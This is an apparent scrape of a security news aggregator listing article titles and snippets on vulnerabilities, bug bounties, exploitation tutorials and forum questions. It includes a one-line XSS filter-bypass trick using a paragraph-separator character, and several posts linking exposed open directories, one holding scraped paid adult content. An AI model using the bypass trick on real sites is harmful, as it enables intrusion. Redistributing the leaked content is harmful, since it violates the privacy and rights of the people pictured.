    Translator: Knownsec 404 Lab (知道创宇404实验室) translation team. Original authors: Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim. Abstract: Web browsers are an integral part of everyone's daily life. They are frequently used for security-critical and privacy-sensitive activities, banking transactions and...
  • Open

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is what attackers will inject into a website to attempt to use your SEO ranking for something else not ranked otherwise that will further the attackers’ objective. They spam and destroy the website while trying to generate revenue or achieve some other goal. Due to this, generally, the website owner is completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by rearranging links that aren’t visible to the average site visitor and only crawlers/index engines can see it.  Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

  • Open

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]  ( 1 min )
  • Open

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »  ( 2 min )
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0  ( 1 min )
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0  ( 7 min )
  • Open

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »  ( 3 min )
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »  ( 3 min )
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »  ( 1 min )
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »  ( 1 min )
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »  ( 3 min )
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »  ( 1 min )
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »  ( 3 min )
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »  ( 2 min )
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »  ( 2 min )
  • Open

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]  ( 2 min )
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]  ( 1 min )
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]  ( 1 min )
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]  ( 1 min )
  • Open

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061
  • Open

    SecWiki News 2022-02-07 Review
    ML-DOCTOR: a holistic study of inference attacks against machine learning models by ourren Identifying and tracing the black and gray market by ourren Grand Theft Auto -- playing with rolling codes (part 2) by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0  ( 4 min )
  • Open

    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

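    FreeBuf Morning News | DHS to focus on tackling the log4j vulnerability; education sector the hardest hit by cyberattacks in 2021
    The software's widespread use and ease of exploitation make this an extremely serious vulnerability, and DHS's best practice is to concentrate on reviewing vulnerabilities in the log4j software library and the associated remediation process.  ( 1 min )
    PayBito cryptocurrency exchange hit by cyberattack, large amount of data stolen
    The LockBit ransomware gang claims to have stolen a large amount of customer data from the PayBito cryptocurrency exchange.  ( 1 min )
    Multiple flights delayed! Swiss airport services company Swissport hit by ransomware attack
    Swissport International Ltd. was hit by a ransomware attack, causing multiple flights to be delayed.
    Winter Training Camp | New challenges in advanced threats to mobile devices, and countering and detecting them
    According to public statistics, by mid-2021 the number of mobile internet users had reached 1.007 billion.  ( 1 min )
    Winter Training Camp | New developments in threat frameworks
    This article introduces and analyzes new developments in the research and application of the ATT&CK threat framework in 2021 from three angles: new content, new directions and new forces.  ( 1 min )
    Winter Training Camp | A solution for deploying commercial cryptography applications
    With the deepening development of digitalization, networking and intelligent technology, and the transformations brought by big data, cloud computing, blockchain, AI and other technologies, new business models keep emerging across industries.  ( 1 min )
    Microsoft blocked tens of billions of brute-force and phishing attacks last year
    From January 2021 to December 2021, Microsoft blocked more than 25.6 billion Azure AD brute-force authentication attacks and intercepted 35.7 billion phishing emails.  ( 1 min )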
  • Open

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company have multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big project I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise ? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]  ( 2 min )
    Do penetration testers ever get called in at 3AM?
    submitted by /u/notburneddown [link] [comments]  ( 3 min )
  • Open

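    Learning V8 exploitation from scratch: CVE-2021-30517 (Part 7)
    Author: Hcamael@Knownsec 404 Lab (知道创宇404实验室). Related reading: Learning V8 exploitation from scratch: environment setup (Part 1) Learning V8 exploitation from scratch: the generic V8 exploit chain (Part 2) Learning V8 exploitation from scratch: starctf 2019 OOB (Part 3) Learning V8 exploitation from scratch: CVE-2020-6507 (Part 4) Learning V8 exploitation from scratch: CVE-2021-30632 (Part 5) Learning V8 expl...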

  • Open

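    Paragraph Separator(U+2029) XSS
    Gareth Heyes shared a fun XSS trick. Thinking about how the browser handles it, I got the feeling it could be used for bypasses in several forms. It's simple, so let's take a look together 😎 U+2029 XSS #!@*%
alert(1) Normally, if you looked at code like the above, you would think it could never execute. So shall we copy it and paste it into the browser? ??!?!? Yes, the alert fires. This works because the special character between $ and alert, namely the Paragraph Separator, caused the browser to split the input there.
    Only developers? No, we need a scratch pad too! Boop!
    I often browse the App Store to see if there are any fun apps. While doing so I found a tool that looked useful for security testing, tried it out over this holiday, found it decent, and am sharing it through the blog. It's Boop. Boop You can think of Boop as a scratch pad for developers. It is a small editor in which you can easily use functions such as substitution while writing and editing code and various kinds of data. The official GitHub also introduces it as follows. A scriptable scratchpad for developers. In slow yet steady progress. In Boop, pressing CMD+b brings up the action list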
  • Open

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »  ( 1 min )
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »  ( 1 min )
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »  ( 2 min )
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »  ( 1 min )
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »  ( 2 min )
  • Open

    End-2-End file transfer
    Hi, I want to download a file directly from a friend computer, what's the most secure way to do it with an encrypted tunnel ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months time and wanted to see if anyone great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]  ( 1 min )
    Book Recommendations for Memory Level Security
    Hi, I would like to ask for book advice to understand how operating systems' memory level operations work. For example, I want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures these operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs are mostly written in C? submitted by /u/execute_sh [link] [comments]  ( 1 min )
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team has a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]  ( 3 min )
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]  ( 1 min )
  • Open

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 08
    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that this image took me a bit longer… Continue reading on Medium »  ( 7 min )
  • Open

    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
  • Open

    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    SysInternals — The Other Way Around
    We all have been sometime, someday in our professional life have used SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following steps through part 1, we have lab setup and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
  • Open

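    FreeBuf Morning News | US indicts multiple "scam" call centers; an American hacker launches an attack on North Korea's network
    Oil loading, unloading and transshipment at several ports in Amsterdam and Rotterdam in the Netherlands and Antwerp in Belgium were disrupted by a ransomware attack.  ( 1 min )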
  • Open

    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]
  • Open

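    Learning V8 exploitation from scratch: CVE-2021-38001 (Part 6)
    Author: Hcamael@Knownsec 404 Lab (知道创宇404实验室). Related reading: Learning V8 exploitation from scratch: environment setup (Part 1) Learning V8 exploitation from scratch: the generic V8 exploit chain (Part 2) Learning V8 exploitation from scratch: starctf 2019 OOB (Part 3) Learning V8 exploitation from scratch: CVE-2020-6507 (Part 4) Learning V8 exploitation from scratch: CVE-2021-30632 (Part 5) CVE-2021-380...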
  • Open

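    [Translation] [Paper] The Raft Consensus Algorithm (with an etcd/raft source code walkthrough) (USENIX, 2014)
    Translator's preface: This article is a translation of the USENIX 2014 paper In Search of an Understandable Consensus Algorithm (Extended Version), which proposed the now widely used Raft consensus algorithm. Before Raft, Paxos was almost synonymous with consensus algorithms, but it has two serious drawbacks: it is hard to understand accurately (even for professional researchers and professors in the field), and it is hard to implement correctly (it is complex, and some of its theoretical descriptions are rather vague). The result is just as the developers of Chubby (Google's Paxos-based distributed lock service, the foundation of many of Google's globally distributed systems) put it: "There is a huge gap between the description of the Paxos algorithm and real-world needs, ...... the final system will in fact be built on an unproven protocol" [4]. For university professors there is an even more practical difficulty: Paxos is complex and hard to understand, yet there is no alternative algorithm suitable for teaching. So, starting from the needs of both academia and industry, Stanford PhD student Diego Ongaro and his advisor John Ousterhout proposed the Raft algorithm, whose foremost design goal is understandability, which is also why the paper is titled "In Search of an Understandable Consensus Algorithm". Like the original paper's goal of understandability, this translation was also made in order to better understand the Raft algorithm. So, besides adjusting the layout and adding a number of subheadings during translation to make it easier to read on the web, this article also cross-references the implementation in etcd/raft v0.4; that version already implements most of the Raft protocol's functionality but has not yet had engineering optimizations applied, and its functions, variables and so on broadly map onto the paper, which helps a great deal in understanding the algorithm. Given the translator's limited ability, this article inevitably contains omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface Abstract 1 Introduction 1.1 Background and purpose of this paper 1.2 Summary of research results 1.3 Organization of this paper 2 Replicated state machines …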

  • Open

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming http traffic to be forwarded to the webserver. However, for this to work, I would need to have a fixed public address, which is not the case for me. Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm lacking trying to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS Poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get infos like users, policies, etc? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on Public WiFi Hotspots. Do I definitely need a VPN or just ensure I'm connecting to sites with HTTPS? What about if I use cellular instead..? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
  • Open

    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
  • Open

    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    as it was mention needed to find the camera model number, exif this image but found nothing. again after reviewing the image get to know… Continue reading on Medium »  ( 1 min )
  • Open

    Solving TryHackMe's Daily Bugle Pt1
    Good morning, afternoon or evening, dear readers; today I bring you my first post on Medium, the solution to the room… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
  • Open

    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry including me as an individual including my personal blog and all the socially-oriented work and contributors that I've made to the industry during the past ten years? If an image is worth a thousand words consider going through these images which I just found and took photos of and guess what - brace yourselves for the ultimate reality where I've officially spend over two decades actively working and researching the security industry. What's my idea to publish these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Does a master’s in cybersecurity and digital forensics require an engineering maths background or is Bachelors in IT with topics like Basic maths, discrete structure and Numerical methods enough?
    what i know from my research is that different universities have different criteria like Calculus I and II but a basic undergrad IT course may not contain multiple maths topic like Computer science or engineering course does. So will bachelors in Information technology be enough to later apply as international student in different countries for Msc cyber forensics submitted by /u/axyut [link] [comments]  ( 2 min )
  • Open

    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    To learn the basics of SSRF, you can read Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-05 Review
    A supplement to new techniques for getting Java deserialization data past a WAF by ourren Series: Evolving advanced threat governance (5) by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
  • Open

    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
  • Open

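    Learning V8 Exploitation from Scratch: CVE-2021-30632 (Part 5)
    Author: Hcamael@Knownsec 404 Lab Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1) Learning V8 Exploitation from Scratch: A Generic V8 Exploit Chain (Part 2) Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3) Learning V8 Exploitation from Scratch: CVE-2020-6507 (Part 4) Reproducing CVE-2021-30632 The third vulnerability studied is CVE-2021-30632, its chrom...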
  • Open

    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
  • Open

    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
  • Open

    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on portswigger web sec academy and I came across a DTD payload with the characters "%" in the nested entities. I tried to find if there is a syntax specification for this in xml but found nothing regarding it, all I found by googling this are just some more xml payloads. So, anybody have any idea what these characters exactly are and what they do? I am thinking like these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. PS: I am a complete newbie. So, if this is a stupid question forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I opt in my college first year (1st sem), The college gave us the syllabus of C, I'm pretty bad at it cuz C isn't something that I had dealt firsthand in the last year and tbh I'm a python kinda guy I only worked with python so C isn't a area of my interest. So my question is that Do I need to be too good at C is it gonna be relevant somehow later in hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while, I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks, and such things. Last I checked it was the ALFA AWUS 036 N card, I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell, is actually nothing - with a strong password, WPA-2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n cards that can inject packets. Just feel like there has been a lot of fragmentation over the last decade and really, any opinions on whether or not the whole "WiFi hacking" gig is dead, well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
  • Open

    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
  • Open

    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
